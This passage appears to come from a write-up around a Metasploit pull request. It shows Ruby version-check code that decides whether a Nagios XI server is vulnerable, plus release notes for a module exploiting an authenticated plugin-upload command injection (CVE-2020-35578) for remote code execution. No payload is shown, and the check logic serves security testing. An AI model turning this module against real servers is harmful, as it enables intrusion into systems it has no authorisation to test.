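    [:detected, 'Failed to sign the license agreement.', nil]
  else
    [:unknown, "Unhandled login result #{login_result.inspect}", nil]
  end
end

# The check decision: :unknown, :detected, :appears_unsupported (vulnerable
# but below 5.3.0, e.g. 2014R2.7 or 5.2.3), :appears, or :safe (>= 5.8.0).
def nagios_xi_check(login_result, res_array, version_string)
  code, _detail, _cookies = classify_login(login_result, res_array)
  return code unless code == :ok
  return :detected if version_string.nil? || version_string.empty?

  version = Gem::Version.new(normalize_nagios_version(version_string))
  return :safe if version >= FIXED_VERSION
  return :appears_unsupported if version < MIN_SUPPORTED

  :appears
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs, not captured from a real target.
  ok = [0, ['<html>dashboard</html>', 'nagiosxi=constructedcookie']]
  puts nagios_xi_check(*ok, '5.7.3')            # appears
  puts nagios_xi_check(*ok, '2014R2.7')         # appears_unsupported
  puts nagios_xi_check(4, [nil, nil], '5.7.3')  # unknown
end
```

Because the normalisation happens after the version is printed, the transcript still shows the real string (2014R2.7) while the comparison runs against the placeholder, which is the behaviour the thread describes.
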
…e cases where the version number may not be in a format that Rex::Text can immediately handle.
@gwillcox-r7 gwillcox-r7 merged commit 832ca92 into rapid7:master Apr 14, 2021
@gwillcox-r7 gwillcox-r7 added the rn-modules release notes for new or majorly enhanced modules label Apr 14, 2021
@gwillcox-r7

gwillcox-r7 commented Apr 14, 2021

Release Notes

New module exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce exploits CVE-2020-35578, an RCE in Nagios XI versions prior to 5.8.0 that utilizes a command injection when uploading plugins to allow authenticated administrative users to gain remote code execution as the apache user on affected systems.

Labels
docs module rn-modules release notes for new or majorly enhanced modules